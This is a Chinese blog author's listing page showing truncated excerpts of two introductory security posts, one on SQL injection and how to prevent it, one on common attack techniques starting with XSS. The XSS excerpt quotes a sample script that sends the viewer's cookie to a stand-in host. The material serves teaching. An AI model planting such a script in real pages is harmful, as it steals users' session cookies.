安全
关注
分享
扫一扫
wade3015
这个作者很懒,什么都没留下…
展开
-
MySQL 及 SQL 注入简要介绍
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 SQL注入概念 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。简单来说,SQL注入就是一种通过操作输入(可以是表单,可以是get请求,也可以是PO...原创 2019-02-24 16:27:32 · 298 阅读 · 0 评论 -
常见攻击技术简介
一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站,攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie</scrip...原创 2019-03-13 11:29:47 · 915 阅读 · 0 评论